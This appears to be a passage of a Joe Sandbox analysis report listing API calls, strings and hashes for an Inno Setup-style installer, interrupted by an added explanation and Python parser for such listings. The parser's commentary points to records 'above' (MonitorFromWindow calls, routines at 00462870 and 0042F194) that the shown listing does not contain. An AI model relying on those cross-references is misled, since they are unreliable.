                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                              • String ID:
                                                                              • API String ID: 1694776339-0
                                                                              • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                              • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                              • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                              • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                              APIs
                                                                              • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                              • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                              • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                              • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                              • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                              • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                              • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                              • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$EnableItem$System
                                                                              • String ID:
                                                                              • API String ID: 3985193851-0
                                                                              • Opcode ID: d8fcfd45993f68361b05288e300d90e061abaf0c01acb012dac33f8cfd749464
                                                                              • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                              • Opcode Fuzzy Hash: d8fcfd45993f68361b05288e300d90e061abaf0c01acb012dac33f8cfd749464
                                                                              • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
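The records above are Joe Sandbox's per-function listing: an APIs block, an optional Strings block, the memory-dump source, and a Similarity block whose Opcode ID and API String ID fingerprint the function. Pulling them into structured data answers two triage questions quickly: which symbols each routine resolves at runtime through GetModuleHandleA/GetProcAddress (MonitorFromWindow, GetMonitorInfoA and GetUserDefaultUILanguage in the records above; the sandbox prints the stack at call time, so the symbol name sometimes appears in the GetModuleHandleA arguments rather than in GetProcAddress's), and which records share an API String ID under different Opcode IDs (the two window-placement routines at 00462870 and 0042F194). The parser below is an added example, not Joe Sandbox's own code and not part of the report; its SAMPLE text is constructed from lines on this page recombined into three short records, and the header set and regular expressions are assumptions about the text export, not a documented grammar.

```python
"""Parse per-function records from a Joe Sandbox execution-graph listing. Added
example, not Joe Sandbox's own code: SAMPLE is constructed from lines on this page,
recombined into three short records; HEADERS and the regexes are assumptions."""
import re
from collections import defaultdict, namedtuple
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E1C0,00000000), ref: 0042E441
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
Strings
• DeinitializeSetup, xrefs: 004813F1
Memory Dump Source
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Similarity
• API String ID: 4190037839-2312295185
• Opcode ID: cc4cf932d7b220052410dacf18b487448e6dec6834fb41b85ae1fa26c47c2f69
APIs
• GetActiveWindow.USER32 ref: 00462870
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00462884
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462891
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0046289E
Similarity
• API String ID: 2610873146-3407710046
• Opcode ID: 963cd5e9bec20ae9785dbab648af90e3917fdde5ac028f1e20745c9c218af8a1
APIs
• GetActiveWindow.USER32 ref: 0042F194
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000), ref: 0045349F
Similarity
• API String ID: 2610873146-3407710046
• Opcode ID: fe4f6826bb7301b99e83fbe15c42cc49c8205db95b757379d9683ee99bf223cf
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LOADERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
                    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^•\s*(?P<s>.*), xrefs:\s*(?P<ref>[0-9A-F]{8})$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
HEX_RE = re.compile(r"^-?[0-9A-F]{8}$")  # a raw stack slot, as opposed to a name
ApiCall = namedtuple("ApiCall", "api module args ref subcall_of")

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "Opcode ID" -> [value], etc.
    seen: set = field(default_factory=set)      # headers consumed so far

def parse_records(text):
    """Split the listing into records: a header that repeats starts the next record."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip().removesuffix("Download File").rstrip()  # link residue
        if not line:
            continue
        if line in HEADERS:
            if not cur.seen or line in cur.seen:
                cur = FunctionRecord()
                records.append(cur)
            cur.seen.add(line)
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings.append((m["s"], m["ref"]))
        elif section not in (None, "APIs", "Strings") and (m := FIELD_RE.match(line)):
            cur.fields.setdefault(m["key"], []).append(m["val"])
    return records

def resolved_imports(rec):
    """Pair each GetProcAddress with the module of the nearest preceding loader call.
    The sandbox prints the stack at call time, so the symbol name sometimes surfaces
    in the loader call's arguments rather than GetProcAddress's; both are handled."""
    module, pending, out = None, [], []
    for c in rec.apis:
        names = [a for a in c.args if a and a != "?" and not HEX_RE.match(a)]
        mods = [n for n in names if n.lower().endswith(".dll")]
        syms = [n for n in names if n not in mods]
        if c.api in LOADERS:
            module, pending = (mods[0] if mods else module), syms
        elif c.api == "GetProcAddress":
            out.extend((module, s) for s in (syms or pending[:1]))
            pending = pending if syms else pending[1:]
    return out

def clone_groups(records):
    """API String ID -> Opcode IDs for records that share the ID under different
    opcode hashes: near-duplicate routines worth diffing rather than re-reading."""
    groups = defaultdict(list)
    for r in records:
        sid, oid = r.fields.get("API String ID"), r.fields.get("Opcode ID")
        if sid and oid:
            groups[sid[0]].append(oid[0])
    return {k: v for k, v in groups.items() if len(v) > 1}
```

Feed the parser the text export of the whole function listing rather than SAMPLE to get the full picture; the "Download File" link text that the export appends to each Associated line is stripped before matching. Two records with the same Opcode ID are byte-identical code; the same API String ID under different Opcode IDs, as with the two window-placement routines above, marks functions that do the same thing with different bytes and are worth diffing against each other instead of reading twice.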
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(10000000), ref: 004814F5
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00481509
                                                                              • SendNotifyMessageA.USER32(0002042A,00000496,00002710,00000000), ref: 0048157B
                                                                              Strings
                                                                              • DeinitializeSetup, xrefs: 004813F1
                                                                              • Restarting Windows., xrefs: 00481556
                                                                              • GetCustomSetupExitCode, xrefs: 00481395
                                                                              • Deinitializing Setup., xrefs: 00481356
                                                                              • Not restarting Windows because Setup is being run from the debugger., xrefs: 0048152A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Similarity
                                                                              • API ID: FreeLibrary$MessageNotifySend
                                                                              • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                              • API String ID: 3817813901-1884538726
                                                                              APIs
                                                                              • SHGetMalloc.SHELL32(?), ref: 0046153B
                                                                              • GetActiveWindow.USER32 ref: 0046159F
                                                                              • CoInitialize.OLE32(00000000), ref: 004615B3
                                                                              • SHBrowseForFolder.SHELL32(?), ref: 004615CA
                                                                              • CoUninitialize.OLE32(0046160B,00000000,?,?,?,?,?,00000000,0046168F), ref: 004615DF
                                                                              • SetActiveWindow.USER32(?,0046160B,00000000,?,?,?,?,?,00000000,0046168F), ref: 004615F5
                                                                              • SetActiveWindow.USER32(?,?,0046160B,00000000,?,?,?,?,?,00000000,0046168F), ref: 004615FE
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                              • String ID: A
                                                                              • API String ID: 2684663990-3554254475
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,0047292D,?,?,?,00000008,00000000,00000000,00000000,?,00472B89,?,?,00000000,00472DF8), ref: 00472890
                                                                                • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,00498261,00000000,004982B6,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0047292D,?,?,?,00000008,00000000,00000000,00000000,?,00472B89), ref: 00472907
                                                                              • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047292D,?,?,?,00000008,00000000,00000000,00000000), ref: 0047290D
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                              • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                              • API String ID: 884541143-1710247218
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D10D
                                                                              • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D11D
                                                                              • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D12D
                                                                              • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D13D
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                              • API String ID: 190572456-3516654456
                                                                              APIs
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                              • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                              • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                              • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                              Similarity
                                                                              • API ID: Color$StretchText
                                                                              • String ID:
                                                                              • API String ID: 2984075790-0
                                                                              APIs
                                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004580C8,?, /s ",?,regsvr32.exe",?,004580C8), ref: 0045803A
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CloseDirectoryHandleSystem
                                                                              • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                              • API String ID: 2051275411-1862435767
                                                                              APIs
                                                                              • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                              • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                              • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                              • GetSysColor.USER32(00000010), ref: 0044D202
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                              Similarity
                                                                              • API ID: Text$Color$Draw$OffsetRect
                                                                              • String ID:
                                                                              • API String ID: 1005981011-0
                                                                              APIs
                                                                                • Part of subcall function 004776B4: GetWindowThreadProcessId.USER32(00000000), ref: 004776BC
                                                                                • Part of subcall function 004776B4: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004777B3,0049C0A4,00000000), ref: 004776CF
                                                                                • Part of subcall function 004776B4: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004776D5
                                                                              • SendMessageA.USER32(00000000,0000004A,00000000,F{G), ref: 004777C1
                                                                              • GetTickCount.KERNEL32 ref: 00477806
                                                                              • GetTickCount.KERNEL32 ref: 00477810
                                                                              • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477865
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                              • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d$F{G
                                                                              • API String ID: 613034392-3657229555
                                                                              APIs
                                                                                • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C192,00000000,0045C31D,?,00000000,00000002,00000002), ref: 00450933
                                                                                • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,00498261,00000000,004982B6,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 004960F5
                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496109
                                                                              • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00496123
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 0049612F
                                                                              • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00496135
                                                                              • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00496148
                                                                              Strings
                                                                              • Deleting Uninstall data files., xrefs: 0049606B
                                                                              Similarity
                                                                              • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                              • String ID: Deleting Uninstall data files.
                                                                              • API String ID: 1570157960-2568741658
                                                                              • Opcode ID: 1c14f06cf20906d6098757f7c161041ddb556eb254dcbfb897c76230ada43d7f
                                                                              • Instruction ID: a2b0394162f9d438edd1a59a6b8f88e08a82a6f464fdedc4f7b2e31c99877ff7
                                                                              • Opcode Fuzzy Hash: 1c14f06cf20906d6098757f7c161041ddb556eb254dcbfb897c76230ada43d7f
                                                                              • Instruction Fuzzy Hash: 5F218570304250AFEB10EB7AFCC6B163798EB54728F52453BB505962D3D67CAC04CA6C
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
• RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0047016D,?,?,?,?,00000000), ref: 004700D7
• RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0047016D), ref: 004700EE
• AddFontResourceA.GDI32(00000000), ref: 0047010B
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0047011F
Strings
• Failed to set value in Fonts registry key., xrefs: 004700E0
• Failed to open Fonts registry key., xrefs: 004700F5
• AddFontResource, xrefs: 00470129
Similarity
• API ID: CloseFontMessageNotifyOpenResourceSendValue
• String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
• API String ID: 955540645-649663873
• Opcode ID: fb5005e48ab5c7daaaac94a0dc4afa742b509cb9d69f51cda3f3c10b282e3f45
• Instruction ID: 4679b390ee7f38cc50779b5755f8f256d37ac4db7264feb969586a41c0613652
• Opcode Fuzzy Hash: fb5005e48ab5c7daaaac94a0dc4afa742b509cb9d69f51cda3f3c10b282e3f45
• Instruction Fuzzy Hash: 1E21F470741204BBD710EA669C42FAE779DDB45704F908077B904EB3C2DA7DEE01962D
APIs
  • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
  • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
  • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
• GetVersion.KERNEL32 ref: 00462CD4
• SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462D12
• SHGetFileInfo.SHELL32(00462DB0,00000000,?,00000160,00004011), ref: 00462D2F
• LoadCursorA.USER32(00000000,00007F02), ref: 00462D4D
• SetCursor.USER32(00000000,00000000,00007F02,00462DB0,00000000,?,00000160,00004011), ref: 00462D53
• SetCursor.USER32(?,00462D93,00007F02,00462DB0,00000000,?,00000160,00004011), ref: 00462D86
Similarity
• API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
• String ID: Explorer
• API String ID: 2594429197-512347832
• Opcode ID: b2508eec98d805366e2f4507ea44d46b961a44d372cb9f0a28019716940d75e3
• Instruction ID: 9dbbc9fa048eb90f76178aab56daef4cc46522196ca1757d39461a436d1c0ce4
• Opcode Fuzzy Hash: b2508eec98d805366e2f4507ea44d46b961a44d372cb9f0a28019716940d75e3
• Instruction Fuzzy Hash: A521D2707403047AE711BB758D47B9A36989B09708F5004BFF608EA2C3EEBC9801866E
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02342BDC,?,?,?,02342BDC,00478054,00000000,00478172,?,?,-00000010,?), ref: 00477EA9
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477EAF
• GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02342BDC,?,?,?,02342BDC,00478054,00000000,00478172,?,?,-00000010,?), ref: 00477EC2
• CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02342BDC,?,?,?,02342BDC), ref: 00477EEC
• CloseHandle.KERNEL32(00000000,?,?,?,02342BDC,00478054,00000000,00478172,?,?,-00000010,?), ref: 00477F0A
Similarity
• API ID: FileHandle$AddressAttributesCloseCreateModuleProc
• String ID: GetFinalPathNameByHandleA$kernel32.dll
• API String ID: 2704155762-2318956294
• Opcode ID: 4ac9b8a734794afedd7c4e5dff1684406e57be29ff440d920efac7cf7b76c0e4
• Instruction ID: 07fb0e6c3cbff21d125a0516fcac6af2f028e938fd8349bed9720d5bfc433141
• Opcode Fuzzy Hash: 4ac9b8a734794afedd7c4e5dff1684406e57be29ff440d920efac7cf7b76c0e4
• Instruction Fuzzy Hash: 2101B55074870536E520316A5E86FBF648C8B5477DF548137FB1CEE2D2E9AC9D06026E
APIs
• GetLastError.KERNEL32(00000000,00459DDE,?,00000000,00000000,00000000,?,00000006,?,00000000,004973CD,?,00000000,00497470), ref: 00459D22
  • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
Strings
• Failed to delete directory (%d)., xrefs: 00459DB8
• Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459D97
• Failed to delete directory (%d). Will retry later., xrefs: 00459D3B
• Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459CFC
• Stripped read-only attribute., xrefs: 00459CE4
• Deleting directory: %s, xrefs: 00459CAB
• Failed to strip read-only attribute., xrefs: 00459CF0
Similarity
• API ID: CloseErrorFindLast
• String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
• API String ID: 754982922-1448842058
• Opcode ID: 8aabd4c25723369bf9534759df9b588e5f8490088031ca791ae669e8a2666fca
• Instruction ID: 5a692d040748e25b342bfc59b5c440c53b4552d2faa6a9747d6521fe41ba2a01
• Opcode Fuzzy Hash: 8aabd4c25723369bf9534759df9b588e5f8490088031ca791ae669e8a2666fca
• Instruction Fuzzy Hash: 69419330A04248DACB10DB6A98417AE76B59F8530AF54857BAC05E7383DB7C8D0DC75D
APIs
• GetCapture.USER32 ref: 00422EA4
• GetCapture.USER32 ref: 00422EB3
• SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
• ReleaseCapture.USER32 ref: 00422EBE
• GetActiveWindow.USER32 ref: 00422ECD
• SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
• SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
• GetActiveWindow.USER32 ref: 00422FBF
Similarity
• API ID: CaptureMessageSend$ActiveWindow$Release
• String ID:
• API String ID: 862346643-0
• Opcode ID: 3da4ec300de865232a3f60c9f80223c2bbe2427c246ff190c68097af5e341dae
• Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
• Opcode Fuzzy Hash: 3da4ec300de865232a3f60c9f80223c2bbe2427c246ff190c68097af5e341dae
• Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
APIs
• GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
• GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
• GetActiveWindow.USER32 ref: 0042F2DA
• MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
• SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
Similarity
• API ID: Window$ActiveLong$Message
• String ID:
• API String ID: 2785966331-0
• Opcode ID: ca0cfe640851e4463c520fee9942c9233ac98ecb3d765a436798e71af7845e74
• Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
• Opcode Fuzzy Hash: ca0cfe640851e4463c520fee9942c9233ac98ecb3d765a436798e71af7845e74
• Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
APIs
• GetDC.USER32(00000000), ref: 0042948A
• GetTextMetricsA.GDI32(00000000), ref: 00429493
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(00000000,00000000), ref: 004294A2
• GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
• SelectObject.GDI32(00000000,00000000), ref: 004294B6
• ReleaseDC.USER32(00000000,00000000), ref: 004294BE
• GetSystemMetrics.USER32(00000006), ref: 004294E3
• GetSystemMetrics.USER32(00000006), ref: 004294FD
Similarity
• API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
• String ID:
• API String ID: 1583807278-0
• Opcode ID: 62880ac9d08e5d684fd074e0f3ca61438eede96ade4d4e291019075c7fd144c0
• Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
• Opcode Fuzzy Hash: 62880ac9d08e5d684fd074e0f3ca61438eede96ade4d4e291019075c7fd144c0
• Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
APIs
• GetDC.USER32(00000000), ref: 0041DE27
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
• ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
• MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
• GetStockObject.GDI32(00000007), ref: 0041DE5B
• GetStockObject.GDI32(00000005), ref: 0041DE67
• GetStockObject.GDI32(0000000D), ref: 0041DE73
• LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
Similarity
• API ID: ObjectStock$CapsDeviceIconLoadRelease
• String ID:
• API String ID: 225703358-0
• Opcode ID: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
• Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
• Opcode Fuzzy Hash: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
• Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                              APIs
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 004631B8
                                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046324D), ref: 004631BE
                                                                              • SetCursor.USER32(?,00463235,00007F02,00000000,0046324D), ref: 00463228
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load
                                                                              • String ID: $ $Internal error: Item already expanding
                                                                              • API String ID: 1675784387-1948079669
                                                                              • Opcode ID: 9a907484170bb085a46c4a598b93bfbbd2bc194262705c34c2f461fc244cfbd4
                                                                              • Instruction ID: 06b17efc2869e1117ca0a97e11558f018c2dd138a4dd01a316207194f11c04f7
                                                                              • Opcode Fuzzy Hash: 9a907484170bb085a46c4a598b93bfbbd2bc194262705c34c2f461fc244cfbd4
